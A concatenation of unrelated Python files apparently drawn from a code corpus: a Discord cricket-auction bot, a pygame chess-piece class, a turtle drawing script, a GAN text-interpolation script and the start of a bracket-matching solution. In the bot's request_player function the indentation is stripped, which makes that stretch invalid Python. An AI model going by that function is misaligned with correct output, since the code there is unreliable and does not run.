    global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, auction_data
    if not current_player:
        # Nothing on the block to mark.
        embed = discord.Embed(title="No Player Unsold",
                              description="No player to mark as unsold.",
                              color=discord.Color.red())
        await channel.send(embed=embed)
        return
    # Remember the player together with their base price for $getunsold.
    unsold_players.add((current_player, current_player_price))
    notice = discord.Embed(
        title="Player Marked as Unsold",
        description=f'{current_player} has been marked as unsold and saved for later use.',
        color=discord.Color.greyple())
    await channel.send(embed=notice)
    current_player = None
    current_player_price = None
async def show_unsold(channel):
    """List every player previously marked unsold together with their base price."""
    global current_auction_set, current_player, unsold_players
    if not unsold_players:
        empty = discord.Embed(title="No Unsold Players",
                              description="There are no unsold players available.",
                              color=discord.Color.greyple())
        await channel.send(embed=empty)
        return
    listing = "\n".join(f'{player} (Base Price: {price})'
                        for player, price in unsold_players)
    roster = discord.Embed(title="Unsold Players",
                           description=listing,
                           color=discord.Color.greyple())
    await channel.send(embed=roster)
async def get_unsold(channel):
    """Put an arbitrary previously-unsold player back on the auction block."""
    global current_auction_set, current_player, unsold_players
    # A pending sale must be completed first.
    if current_player is not None:
        await complete_sale(channel)
        return None
    if not unsold_players:
        empty = discord.Embed(title="No Unsold Players",
                              description="There are no unsold players available.",
                              color=discord.Color.greyple())
        await channel.send(embed=empty)
        current_player = None
        return
    # set.pop() removes an arbitrary (player, base_price) pair.
    player, base_price = unsold_players.pop()
    card = discord.Embed(title=f"Unsold Player: {player}",
                         description=f'Base Price: {base_price}',
                         color=discord.Color.greyple())
    await channel.send(embed=card)
    current_player = player
    # DM subscribers who asked to be pinged for this player.
    for user_id, players_to_notify in user_notifications.items():
        if player in players_to_notify:
            subscriber = await client.fetch_user(user_id)
            if subscriber:
                await subscriber.send(f"**{player}** is live in the auction!")
##################################################################
# Removing Players:
##################################################################
async def remove_player(team_name, player_name, channel):
    """Remove *player_name* from *team_name*, refund the purse, scrub the sale record.

    Bugs fixed: the original mutated ``sale_history`` while iterating it
    (``list.remove`` inside the loop can skip entries), and indexing
    ``sale["team_name"]`` raised KeyError on trade records, which do not
    carry that key.  The history is now rebuilt in place with ``.get``.
    """
    if team_name in teams:
        if player_name in teams[team_name]:
            # Refund the purchase price (stored /100, matching sell_team).
            player_price = teams[team_name][player_name]
            purse[team_name] += player_price / 100
            # Remove the player from the team's roster
            del teams[team_name][player_name]
            # Rebuild the history in place, dropping matching sale entries;
            # trade records lack these keys and are kept untouched.
            sale_history[:] = [
                sale for sale in sale_history
                if not (sale.get("team_name") == full_team_names[team_name]
                        and sale.get("player_name") == player_name)
            ]
            # Create an embedded message to announce the player removal
            embed = discord.Embed(
                title=f'Player Removed: {player_name}',
                description=f'{player_name} has been removed from Team: {full_team_names[team_name]}.',
                color=discord.Color.green())
            await channel.send(embed=embed)
        else:
            # Create an embedded message to indicate that the player is not found in the team
            embed = discord.Embed(
                title=f'Player Not Found: {player_name}',
                description=f'{player_name} is not found in Team: {full_team_names[team_name]}.',
                color=discord.Color.red())
            await channel.send(embed=embed)
    else:
        # Create an embedded message to indicate that the team doesn't exist
        embed = discord.Embed(title=f'Team Not Found: {team_name}',
                              description=f'Team "{team_name}" does not exist.',
                              color=discord.Color.red())
        await channel.send(embed=embed)
##################################################################
# Removing teams:
##################################################################
async def remove_team(team_name, channel):
    """Delete a team, releasing its players into the unsold pool at 1 Cr base.

    Improvement: the original left the team's ``purse``, ``full_team_names``
    and ``team_colors`` entries behind, so a team re-created under the same
    abbreviation without a colour argument inherited the old colour.  Those
    auxiliary entries are now scrubbed as well.
    """
    global teams
    global unsold_players
    # Check if the team exists
    if team_name not in teams:
        embed = discord.Embed(title="Remove Team Failed",
                              color=discord.Color.red())
        embed.add_field(
            name="Error", value=f"The team '{team_name}' does not exist.")
        await channel.send(embed=embed)
        return
    # Add all players from the team to the unsold_players set with a base price of 1 Cr
    for player_name in teams[team_name]:
        unsold_players.add((player_name, 1))
    # Remove the team and its auxiliary state (pop is a safe no-op when absent).
    del teams[team_name]
    purse.pop(team_name, None)
    full_team_names.pop(team_name, None)
    team_colors.pop(team_name, None)
    embed = discord.Embed(title="Remove Team Successful",
                          color=discord.Color.green())
    embed.add_field(name="Team Removed",
                    value=f"The team '{team_name}' has been removed, and all its players are set as unsold at 1 Cr.")
    await channel.send(embed=embed)
##################################################################
# Requesting Players:
##################################################################
# Global gate so only one $request is processed at a time.
request_semaphore = asyncio.Semaphore(1)
async def request_player(user, player_name, channel):
global auction_sets
global unsold_players
global current_player
# Attempt to acquire the semaphore
async with request_semaphore:
# Check if there is a current player being auctioned
if current_player is not None:
embed = discord.Embed(
title=f"Request Denied for {player_name}",
description=f"A player is currently being auctioned: {current_player}",
color=discord.Color.red()
)
await channel.send(embed=embed)
return
# Check if the requested player is in the current auction set
if current_player == player_name:
embed = discord.Embed(
title=f"Requested Player: {player_name}",
description="This player is currently in the auction set.",
color=discord.Color.red()
)
await channel.send(embed=embed)
return
# Send a message indicating that the request is pending confirmation
confirmation_embed = discord.Embed(
title=f'Request for **{player_name}**',
description=f'{user} is requesting for **{player_name}** to be put on sale.',
color=discord.Color.red()
)
confirmation_embed.add_field(
name="Auctioneer to confirm:",
value="Please confirm or deny this request.",
inline=False
)
def check_stop(interaction):
return is_auctioneer(interaction.user) and interaction.message == confirmation_message
# Send the confirmation embed
confirmation_message = await channel.send(embed=confirmation_embed)
confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
view = View()
view.add_item(confirm)
view.add_item(cancel)
await confirmation_message.edit(view=view)
# Define a check function to check which button they clicked
async def confirmed(interaction):
# Check if the requested player is in any of the auction sets
global current_player
await confirmation_message.delete()
for set_name, players in auction_sets.items():
if player_name in players:
# Send the player's card
base_price = base_prices.get(set_name, 'Unknown')
color_value = embed_colors.get(set_name, "blue")
if isinstance(color_value, str):
color = discord.Color.from_str(color_value)
else:
color = discord.Color(value=color_value)
embed = discord.Embed(
title=f"**{player_name}**",
description=f"Base Price: {base_price}\n Set: {set_name}",
color=color
)
player_image_file = f'images/{player_name}.png'
if os.path.isfile(player_image_file):
player_image = discord.File(
player_image_file, filename='Player.png')
embed.set_image(url="attachment://Player.png")
await channel.send(file=player_image, embed=embed)
else:
await channel.send(embed=embed)
for user_id, players_to_notify in user_notifications.items():
if player_name in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player_name}** is live in the auction!")
# Remove the player from the auction set
current_player = player_name
players.remove(player_name)
return
# Check if the requested player is in the unsold players set
for player, base_price in unsold_players:
if player == player_name:
# Send the player's card
embed = discord.Embed(
title=f"**{player_name}**",
description=f"Base Price: {base_price},\n Set: Unsold Players",
color=discord.Color.greyple()
)
await channel.send(embed=embed)
# Remove the player from the unsold players set
current_player = player
for user_id, players_to_notify in user_notifications.items():
if player in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player}** is live in the auction!")
unsold_players.remove((player, base_price))
return
# If the player is not found in either set, send a message
embed = discord.Embed(
title=f"Player Not Found: {player_name}",
description="The requested player was not found in the auction sets or the unsold players set.",
color=discord.Color.red()
)
await channel.send(embed=embed)
    async def cancel_check(interaction):
        # Admin denied the request: announce the denial and remove the
        # confirmation prompt. `player_name`, `channel` and
        # `confirmation_message` are closed over from the enclosing handler.
        cancel_embed = discord.Embed(
            title="Denied request",
            description=f"Request denied for **{player_name}**.",
            color=discord.Color.red()
        )
        await channel.send(embed=cancel_embed)
        await confirmation_message.delete()
        return
confirm.callback = confirmed
cancel.callback = cancel_check
##################################################################
# Showing Team:
##################################################################
async def show_team(team_name, channel):
    """Post an embed describing one team: remaining purse, numbered roster
    with prices, and the team thumbnail if `teams/<name>.png` exists.

    Lookup is case-insensitive; an error embed is sent for unknown teams.
    """
    lookup = team_name.lower()
    matched_name = next((key for key in teams if key.lower() == lookup), None)
    if matched_name is None:
        embed = discord.Embed(title=f'Team Not Found: {team_name}',
                              description=f'Team "{team_name}" does not exist.',
                              color=discord.Color.red())
        await channel.send(embed=embed)
        return
    # Player prices are stored in 1/100ths of a Crore, hence the /100.
    roster_lines = [
        f'{idx}.**{player}({price/100}Cr)**'
        for idx, (player, price) in enumerate(teams[matched_name].items(),
                                              start=1)
    ]
    if roster_lines:
        players_message = "\n".join(roster_lines)
    else:
        players_message = "No players bought by this team."
    purse_amount = purse.get(matched_name, 0)
    full_team_name = full_team_names.get(matched_name, matched_name)
    embed = discord.Embed(
        title=f'Team: {full_team_name}',
        description=f'**Remaining Purse: {purse_amount}**\n\nPlayers:\n{players_message}',
        color=team_colors.get(matched_name, discord.Color.green()))
    # Thumbnail uses the caller-supplied (original-case) name on disk.
    team_image_file = f'teams/{team_name}.png'
    if os.path.isfile(team_image_file):
        team_image = discord.File(team_image_file, filename='Team.png')
        embed.set_thumbnail(url="attachment://Team.png")
        await channel.send(file=team_image, embed=embed)
    else:
        await channel.send(embed=embed)
##################################################################
# Sale History:
##################################################################
async def show_sales(channel):
    """Post the full sale/trade history, sorted by timestamp, split into
    embeds of 30 entries each (Discord embed description size limit)."""
    if not sale_history:
        await channel.send(embed=discord.Embed(
            title='Sales and Trade History',
            description='No sales or trades have been made yet.',
            color=discord.Color.blue()))
        return
    ordered = sorted(sale_history, key=lambda entry: entry['timestamp'])
    chunk_size = 30
    for start in range(0, len(ordered), chunk_size):
        lines = []
        for entry in ordered[start:start + chunk_size]:
            timestamp = entry["timestamp"]
            if entry["type"] == "sale":
                lines.append(
                    f'[{timestamp} IST] **{entry["player_name"]}** sold to **{entry["team_name"]}** for **{entry["price"]}Cr**\n')
            elif entry["type"] == "trade":
                lines.append(
                    f'[{timestamp} IST] **{entry["team_1"]}** traded **{entry["player_1"]}** to **{entry["team_2"]}** for **{entry["player_2"]}**\n')
        await channel.send(embed=discord.Embed(
            title='Sales and Trade History',
            description="".join(lines),
            color=discord.Color.blue()))
##################################################################
# Trade:
##################################################################
async def trade(team1_name, team2_name, players, channel):
    """Handle `$trade <team1> <team2> <player1> / <player2>`.

    Two modes:
      * player-for-player swap when both sides name players;
      * cash purchase when exactly one side is a number (value in Lakhs,
        i.e. 1/100ths of a Crore -- see the `/100` conversions).

    Sends result/error embeds to `channel`. Swap results are mirrored to
    `sales_channel`; cash purchases are not (preserved from the original).
    """
    global sales_channel
    # Split the players argument into two names using "/" as the delimiter.
    player_names = players.split('/')
    if len(player_names) != 2:
        embed = discord.Embed(title="Invalid Trade Command",
                              color=discord.Color.red())
        embed.add_field(name="Usage",
                        value="$trade <team1> <team2> <player1> / <player2>")
        await channel.send(embed=embed)
        return
    player1_name = player_names[0].strip()
    player2_name = player_names[1].strip()
    # Bug fix: validate the teams up front. The cash-purchase branches used
    # to index `teams[...]` before any existence check and crashed with an
    # unhandled KeyError on an unknown team name.
    if team1_name not in teams or team2_name not in teams:
        embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
        embed.add_field(name="Error",
                        value="One or both of the teams do not exist.")
        await channel.send(embed=embed)
        return
    if player1_name.isnumeric() and player2_name.isnumeric():
        # Bug fix: two numbers used to fall into the first numeric branch and
        # crash looking up a "player" that is actually a price.
        embed = discord.Embed(title="Invalid Trade Command",
                              color=discord.Color.red())
        embed.add_field(name="Usage",
                        value="$trade <team1> <team2> <player1> / <player2>")
        await channel.send(embed=embed)
        return
    if player1_name.isnumeric() or player2_name.isnumeric():
        # Cash purchase: the numeric side is the price paid by that team for
        # the player named on the other side.
        if player1_name.isnumeric():
            buyer, seller = team1_name, team2_name
            amount = int(player1_name)
            player = player2_name
        else:
            buyer, seller = team2_name, team1_name
            amount = int(player2_name)
            player = player1_name
        # Bug fix: a missing player previously crashed with KeyError here.
        if player not in teams[seller]:
            embed = discord.Embed(title="Trade Failed",
                                  color=discord.Color.red())
            embed.add_field(
                name="Error",
                value="One or both of the players do not exist in their respective teams.")
            await channel.send(embed=embed)
            return
        if purse[buyer] - amount / 100 < 0:
            embed = discord.Embed(
                title="Trade Failed", color=discord.Color.red())
            embed.add_field(name="Error",
                            value=f"**{buyer}** cannot afford this trade.")
            await channel.send(embed=embed)
            return
        # Move the player and settle the cash.
        value = teams[seller].pop(player)
        teams[buyer][player] = value
        purse[seller] = purse[seller] + amount / 100
        purse[buyer] = purse[buyer] - amount / 100
        add_trade(full_team_names[buyer], full_team_names[seller],
                  f'{amount/100}Cr', player)
        embed = discord.Embed(title="Trade Successful",
                              color=discord.Color.green())
        embed.add_field(
            name="Trade Details",
            value=f"**{player}** from **{seller}** bought for **{amount/100}Cr** by **{buyer}**."
        )
        await channel.send(embed=embed)
        return
    # Player-for-player swap: both players must exist in their teams.
    if player1_name not in teams[team1_name] or player2_name not in teams[
            team2_name]:
        embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
        embed.add_field(
            name="Error",
            value="One or both of the players do not exist in their respective teams.")
        await channel.send(embed=embed)
        return
    player1_value = teams[team1_name][player1_name]
    player2_value = teams[team2_name][player2_name]
    # Both teams must be able to absorb the value difference.
    if (purse[team1_name] + player1_value / 100 - player2_value / 100 < 0) or (
            purse[team2_name] + player2_value / 100 - player1_value / 100 < 0):
        embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
        embed.add_field(name="Error",
                        value="One or both teams cannot afford this trade.")
        await channel.send(embed=embed)
        return
    # Swap the players.
    del teams[team1_name][player1_name]
    del teams[team2_name][player2_name]
    teams[team1_name][player2_name] = player2_value
    teams[team2_name][player1_name] = player1_value
    # Adjust purses by the value difference.
    purse[team1_name] = purse[
        team1_name] + player1_value / 100 - player2_value / 100
    purse[team2_name] = purse[
        team2_name] + player2_value / 100 - player1_value / 100
    # Log the trade.
    add_trade(full_team_names[team1_name], full_team_names[team2_name],
              player1_name, player2_name)
    embed = discord.Embed(title="Trade Successful",
                          color=discord.Color.green())
    embed.add_field(
        name="Trade Details",
        value=f"{player1_name} from {team1_name} traded for {player2_name} from {team2_name}."
    )
    await channel.send(embed=embed)
    if sales_channel:
        await sales_channel.send(embed=embed)  # type: ignore
##################################################################
# Complete Sale:
##################################################################
async def complete_sale(channel):
    """Ask the auctioneer (via Confirm/Cancel buttons) whether the player
    currently on the block should be marked unsold; on confirm, delegate
    to `unsold(channel)`."""
    global auction_sets
    global teams
    global purse
    global sale_history
    # Create an embed for the confirmation message
    confirmation_embed = discord.Embed(
        title=f'Ongoing bid: **{current_player}**',
        description=f'**{current_player}** is currently being bid for.',
        color=discord.Color.red())
    confirmation_embed.add_field(name="Do you wish to mark as Unsold?:",
                                 value="Please confirm or deny this request.",
                                 inline=False)
    # Send the confirmation embed, then attach the two buttons by editing
    # the message with a View (buttons cannot be sent before the message).
    confirmation_message = await channel.send(embed=confirmation_embed)
    confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
    cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
    view = View()
    view.add_item(confirm)
    view.add_item(cancel)
    await confirmation_message.edit(view=view)
    # Button callbacks close over `channel` and `confirmation_message`.
    async def confirmed(interaction):
        # Mark the current player unsold and remove the prompt.
        await unsold(channel)
        await confirmation_message.delete()
        return
    async def cancel_check(interaction):
        # Keep the player on sale; announce and remove the prompt.
        cancel_embed = discord.Embed(title="Player Still On Sale",
                                     description="Unsold marking canceled.",
                                     color=discord.Color.red())
        await channel.send(embed=cancel_embed)
        await confirmation_message.delete()
        return
    confirm.callback = confirmed
    cancel.callback = cancel_check
##################################################################
# Export to csv
##################################################################
async def export(channel):
    """Write every bought player's name into cricket_data.csv (a single
    "Name" column) and upload the file to `channel`."""
    global teams
    with open('cricket_data.csv', 'w', newline='') as file:
        writer = csv.writer(file)
        writer.writerow(["Name"])
        for roster in teams.values():
            writer.writerows([player] for player in roster)
    await channel.send(file=discord.File('cricket_data.csv'))
    return
##################################################################
# Showing Help:
##################################################################
async def show_help(channel):
    """Post two help embeds: auctioneer (admin) commands first, then the
    commands available to all users. Field text lives in data tables so
    the layout stays uniform and easy to extend."""
    auctioneer_fields = (
        ('$add <shorthand> <color> <team_name>',
         'Creates a new team with the given name.'),
        ('$sell <team> <price> <player>', 'Sells a player to a team.'),
        ('$sold <team> <price>', 'Sells the current player to a team.'),
        ('$trade <team1> <team2> <player1>/<player2>',
         'Trades a player from one team to another.\nPurchases one player from other team if one of the player fields is a number, in Lakhs'),
        ('$<set_name>', 'Displays a random player from the set.'),
        ('$removeplayer <team> <player>', 'Removes a player from a team.'),
        ('$removeteam <team>', 'Removes a team.'),
        ('$reset', 'Resets all the sets.'),
        ('$setmaxpurse <value>', 'Sets the maximum purse value. Default 100'),
        ('$setmaxplayers <value>',
         'Sets the maximum players value. Default 25'),
        ('$unsold', 'Marks the current player as unsold.'),
        ('$getunsold', 'Gets a player from the unsold list.'),
        ('$export', 'Exports the data to a csv file.'),
    )
    embed = discord.Embed(title='Help Commands for Auctioneer:',
                          description='Here are the available commands:',
                          color=discord.Color.red())
    for field_name, field_value in auctioneer_fields:
        embed.add_field(name=field_name, value=field_value, inline=False)
    await channel.send(embed=embed)
    user_fields = (
        ('$request <player>', 'Shows the player if available.'),
        ('$showunsold', 'Shows all the unsold players.'),
        ('$teams', 'Shows all the teams.'),
        ('$<team>', 'Shows information about a team.'),
        ('$help', 'Shows this help message.'),
        ('$sets', 'Shows all the sets.'),
        ('$set <set_name>', 'Shows the set with the given name.'),
        ('$timer <value>',
         'Sets a timer for entered seconds. 10 seconds if no input.'),
        ('$sales', 'Shows the history of sales and trades.'),
        ('$notify <player(s) seperated by comma>',
         'Notifies you when the player is live in the auction.(Can use in DM)'),
    )
    embed = discord.Embed(title='Help Commands for All Users:',
                          description='Here are the available commands:',
                          color=discord.Color.brand_green())
    for field_name, field_value in user_fields:
        embed.add_field(name=field_name, value=field_value, inline=False)
    await channel.send(embed=embed)
@client.event
async def on_disconnect():
    """Persist the full auction state whenever the gateway connection drops,
    so a restart can resume mid-auction via `save_data`."""
    global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, filename, pkls
    save_data({
        'teams': teams,
        'purse': purse,
        'auction_sets': auction_sets,
        'sale_history': sale_history,
        'unsold_players': unsold_players,
        'full_team_names': full_team_names,
        'team_colors': team_colors,
        'current_auction_set': current_auction_set,
        'current_player': current_player,
        'current_player_price': current_player_price,
    })
client.run(os.environ['TOKEN'])
| Hydraknight/AuctioneerDiscordBot | auction.py | auction.py | py | 62,558 | python | en | code | 0 | github-code | 13 |
13432993855 | import os
import pygame as pg
from utils.colors import *
class Piece:
    """Base class for a chess piece rendered on a 512x512 board of 64px
    squares, centered on the screen."""

    def __init__(self):
        self.is_white = True
        # Pixel position (top-left of the sprite).
        self.x, self.y = 0,0
        # Board position as (column, row) in 0..7.
        self.board_pos = (0,0)
        self.board_x, self.board_y = self.board_pos
        self.pos = (self.x, self.y)
        self.texture = None
        self.rect = pg.Rect(self.pos, (64,64))
        # Legal destination squares as [row, col] pairs, filled by click().
        self.moves = []
        # One clickable Rect per entry in self.moves.
        self.moves_rect = []
        self.selected = False
        self.hover = False
        # Semi-transparent overlay reused for hover/move highlights.
        self.selection_circle = pg.Surface((64,64))
        self.selection_circle.set_colorkey(BLACK)
        self.selection_circle.set_alpha(128)
        # Index into self.moves currently under the mouse, or -1.
        self.selected_move = -1
    def draw(self, screen, mousepos):
        """Blit the piece at its board square and highlight it on hover."""
        self.hover = False
        # Board origin is centered: (screen - 512) / 2, then 64px per square.
        self.rect.x = (screen.get_size()[0]-512)//2 + (64 * self.board_x)
        self.rect.y = (screen.get_size()[1]-512)//2 + (64 * self.board_y)
        screen.blit(self.texture, (self.rect.x, self.rect.y))
        if self.rect.collidepoint(mousepos):
            self.hover = True
            pg.draw.circle(self.selection_circle, SELECT, (32,32), 16)
            screen.blit(self.selection_circle, (self.rect.x, self.rect.y))
    # (screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])
    def draw_moves(self, screen, mousepos):
        """When selected, highlight each legal move square and record which
        one (if any) the mouse is over in self.selected_move."""
        self.selected_move = -1
        if self.selected:
            for move in self.moves:
                # Note: moves are [row, col], so move[1] is the x offset.
                pg.draw.circle(self.selection_circle, SELECT, (32,32), 16)
                screen.blit(self.selection_circle, ((screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])))
            for i in range(len(self.moves_rect)):
                if self.moves_rect[i].collidepoint(mousepos):
                    self.selected_move = i
    def click(self, screen):
        """Select the piece and (re)compute its move list and click rects.
        Only pawn moves are implemented; captures are not handled yet."""
        self.moves_rect = []
        print(self.board_x, self.board_y)
        self.selected = True
        if self.__str__() == 'bP': # Black Peon
            # Black moves down the board; two squares from the start row (1).
            self.moves = [[self.board_y+1, self.board_x]]
            if self.board_y == 1:
                self.moves += [[self.board_y+2, self.board_x]]
        elif self.__str__() == 'wP': # White Peon
            # White moves up the board; two squares from the start row (6).
            self.moves = [[self.board_y-1, self.board_x]]
            if self.board_y == 6:
                self.moves += [[self.board_y-2, self.board_x]]
        elif self.__str__()[1] == 'K': # Knight
            pass
        for move in self.moves:
            self.moves_rect += [pg.Rect(((screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])), (64,64))]
        print(self.moves_rect)
class Peon(Piece):
    """A pawn; colour selects the texture and the __str__ tag used by
    Piece.click() to pick the move rules."""

    def __init__(self, is_white, pos, board_pos):
        super().__init__()
        self.is_white = is_white
        # `pos` arrives as (row, col); keep pixel coords in (x, y) order.
        self.x, self.y = pos[1], pos[0]
        self.board_x, self.board_y = board_pos[0], board_pos[1]
        self.pos = pos
        self.rect = pg.Rect(self.pos, (64, 64))
        # Bug fix: the white branch used to reset self.moves to None, which
        # is inconsistent with the [] default inherited from Piece and would
        # break any iteration over moves before click() repopulates it.
        texture_name = 'wPeon.png' if is_white else 'bPeon.png'
        self.texture = pg.image.load(os.path.join('assets', 'img', texture_name))

    def __str__(self):
        return 'wP' if self.is_white else 'bP'
31009696143 | import turtle
# Set up a large black canvas and a white pen, then move to the starting
# position of the drawing. `s` controls stroke repetition (line thickness)
# in the helper functions below.
turtle.screensize(canvwidth=2000, canvheight=2000,
                  bg="black")
i = turtle.Turtle()
i.penup()
i.speed(5)
i.backward(600)
i.left(90)
i.forward(100)
i.right(90)
i.pendown()
i.pencolor("white")
i.hideturtle()
i.left(180)
i.penup()
i.hideturtle()
i.circle(-30,90)
i.pendown()
i.showturtle()
i.speed(20)
s = 10
def ifun1():
    # Draw a hooked vertical stroke `s` times, shifting 1 px sideways each
    # pass to thicken the line -- presumably part of a letter glyph;
    # TODO confirm visually.
    for x in range(s):
        i.circle(-30,-90)
        i.backward(180)
        i.circle(30,-90)
        i.left(90)
        i.forward(1)
        i.right(90)
        i.circle(29,90)
        i.forward(180)
        i.circle(-30,90)
def ifun2():
    # Draw a short thick bar built from s*s 1-px passes; on the final pass
    # move forward and curve to position for the next glyph -- presumably
    # the dot/serif of a letter; TODO confirm visually.
    for q in range(s*s):
        i.left(90)
        i.forward(1)
        i.left(90)
        i.forward(20)
        i.right(90)
        i.forward(1)
        i.left(90)
        i.backward(20)
        i.left(180)
        if q >= s*10-1:
            i.forward(90)
            i.circle(-30,90)
# Draw the first glyph (two thick strokes plus the bar), then reposition
# the pen for the next group of shapes.
ifun1()
ifun1()
i.circle(-30,-90)
i.backward(90)
ifun2()
i.right(90)
i.penup()
i.forward(410)
i.left(90)
i.forward(170)
i.pendown()
i.right(90)
def ss():
    # Draw a thick S-like double arc (10 offset passes).
    # NOTE(review): the loop variable shadows the module-level `s`.
    for s in range(10):
        i.left(135)
        i.circle(100,270)
        i.left(90)
        i.forward(1)
        i.right(90)
        i.circle(100,-270)
        i.right(135)
def dd():
    # Draw a thick 300-px straight stroke (10 offset passes).
    for d in range(10):
        i.backward(300)
        i.right(90)
        i.forward(1)
        i.left(90)
        i.forward(300)
def aa():
    # Draw a thick 60-px straight stroke (10 offset passes).
    for ff in range(10):
        i.forward(60)
        i.left(90)
        i.forward(1)
        i.right(90)
        i.backward(60)
def funR():
    # Draw a thick quarter-circle arc (15 offset passes) -- presumably the
    # bowl of a letter; TODO confirm visually.
    for x in range(15):
        i.circle(-131,90)
        i.right(90)
        i.forward(1)
        i.left(90)
        i.circle(-131,-90)
# aa
def afun():
    # Draw a thick rounded shape from 20 offset passes; the final pass adds
    # an extra arc group -- presumably the letter 'a'; TODO confirm visually.
    for a in range(20):
        i.left(90)
        i.circle(-80,180)
        i.forward(150)
        i.circle(80,90)
        i.right(90)
        i.forward(1)
        i.left(90)
        i.circle(81,-90)
        i.backward(150)
        i.circle(-80,-180)
        i.right(90)
        if a >= 20-1 :
            i.left(90)
            i.circle(-80,180)
            i.forward(150)
            for d in range(20):
                i.circle(-80,180)
                i.right(90)
                i.forward(1)
                i.left(90)
                i.circle(-80,180)
# aa
# Compose the middle glyphs by alternating the stroke helpers with pen-up
# repositioning moves. Shapes are drawn in place; exact letters can only be
# confirmed by running the script.
ss()
i.left(90)
i.forward(20)
dd()
i.backward(300)
i.right(30)
aa()
i.penup()
i.right(60)
i.right(180)
i.backward(50)
i.right(90)
i.forward(350)
i.pendown()
dd()
i.backward(300)
i.forward(30)
i.left(90)
i.forward(10)
i.right(90)
i.left(90)
ss()
i.penup()
i.backward(200)
i.right(90)
i.forward(200)
i.pendown()
i.right(90)
afun()
i.penup()
i.backward(200)
i.right(180)
i.right(90)
i.forward(90)
i.left(90)
# i.forward()
i.pendown()
# a
dd()
i.right(180)
i.forward(140)
i.left(180)
funR()
# v
i.penup()
i.right(90)
i.forward(150)
i.left(90)
i.forward(150)
i.right(90)
i.left(100)
i.pendown()
dd()
i.penup()
i.right(100)
i.forward(98)
i.pendown()
i.right(280)
dd()
# E
def efun():
    # Draw a thick near-full-circle curl (100 passes); the final pass closes
    # it and adds a crossbar -- presumably the letter 'e'; TODO confirm
    # visually.
    for x in range(100):
        i.circle(-110,330)
        i.circle(-109.8,-330)
        if x >= 100 - 1:
            i.circle(-109.8,150)
            i.right(90)
            for d in range(10):
                i.forward(220)
                i.right(90)
                i.forward(1)
                i.right(90)
                i.forward(220)
                i.left(90)
                i.left(90)
# Reposition and draw the final glyph.
i.penup()
i.right(80)
i.right(90)
i.forward(200)
i.left(90)
i.forward(200)
i.right(120)
i.pendown()
# i.left(150)
# i.forward(200)
efun()
# i.hideturtle()
turtle.done() | dmahesh9810/python-Turtle | iqBrave.py | iqBrave.py | py | 3,501 | python | en | code | 0 | github-code | 13 |
28517672074 | import os
import sys
import pickle
import argparse
import torch
from torchvision import transforms, utils
sys.path.append('skip-thoughts.torch/pytorch')
from constants import *
from data_pipeline import *
from model import *
from skipthoughts import *
from train import Trainer
from pytorch_pretrained_bert.modeling import BertModel, BertPreTrainedModel
from pytorch_pretrained_bert.modeling_openai import OpenAIGPTModel, OpenAIGPTPreTrainedModel
if __name__ == '__main__':
    # CLI entry point: load a trained text-to-image GAN and interpolate
    # between the embeddings of two captions, saving images to a folder.
    parser = argparse.ArgumentParser()
    parser.add_argument('--output-folder', type=str, required=True,
                        help='Output folder name')
    parser.add_argument('--model-path', type=str, required=True,
                        help='Path to model files')
    parser.add_argument('--text1', type=str, required=True)
    parser.add_argument('--text2', type=str, required=True)
    # The three --use-* flags select mutually preferred encoders below
    # (checked in order: skip-thought, BERT, GPT, else the custom RNN).
    parser.add_argument('--use-skip-thought', action='store_true',
                        help='use pretrained skip thought embedding')
    parser.add_argument('--use-bert', action='store_true',
                        help='use pretrained BERT embedding')
    parser.add_argument('--use-gpt', action='store_true',
                        help='use pretrained GPT embedding')
    parser.add_argument('--hidden-dim', type=int, default=1024,
                        help='RNN hidden dim size')
    parser.add_argument('--embed-size', type=int, default=1024,
                        help='Word embed size')
    args = parser.parse_args()
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    print("Using device {}".format(device))
    # Vocabulary mappings produced by the data pipeline at training time.
    with open(FLOWERS_DATA_ROOT + 'idx_to_word.pkl', 'rb') as f:
        idx_to_word = pickle.load(f)
    with open(FLOWERS_DATA_ROOT + 'word_to_idx.pkl', 'rb') as f:
        word_to_idx = pickle.load(f)
    train_val_dataset = FlowerDataset(
        img_folder=FLOWERS_DATA_ROOT + 'jpg',
        text_folder=FLOWERS_DATA_ROOT + 'train_val',
        word_to_idx=word_to_idx,
        idx_to_word=idx_to_word,
    )
    # Select the text encoder; pretrained encoders are put in eval mode.
    if args.use_skip_thought:
        model = BayesianUniSkip('data/skip_thoughts', word_to_idx.keys())
    elif args.use_bert:
        model = BertModel.from_pretrained('bert-base-uncased')
        model.eval()
    elif args.use_gpt:
        model = OpenAIGPTModel.from_pretrained('openai-gpt')
        model.eval()
    else:
        model = RnnEncoder(dict_size=len(word_to_idx),
                           embed_size=args.embed_size,
                           hidden_dim=args.hidden_dim,
                           drop_prob=0.5)
    generator = Generator()
    discriminator = Discriminator()
    dataloader = torch.utils.data.DataLoader(train_val_dataset,
                                             batch_size=1,
                                             shuffle=True)
    model = model.to(device)
    generator = generator.to(device)
    discriminator = discriminator.to(device)
    # Optimizers/schedulers are None: the Trainer is used for inference only.
    trainer = Trainer(dataloader, model, generator, discriminator, None, None, 1, device, None)
    print("Loading model files")
    trainer.load_model(args.model_path)
    print("Generating image from text")
    trainer.interpolate(args.text1, args.text2, args.output_folder)
    print("Images saved to {}".format(args.output_folder))
| lin-david/text2image | interpolate.py | interpolate.py | py | 3,269 | python | en | code | 0 | github-code | 13 |
class Solution:
    """LeetCode 20 -- Valid Parentheses."""

    def isValid(self, s: str) -> bool:
        """Return True iff every bracket in `s` is closed by the matching
        bracket in the correct (LIFO) order."""
        openers = {'(', '{', '['}
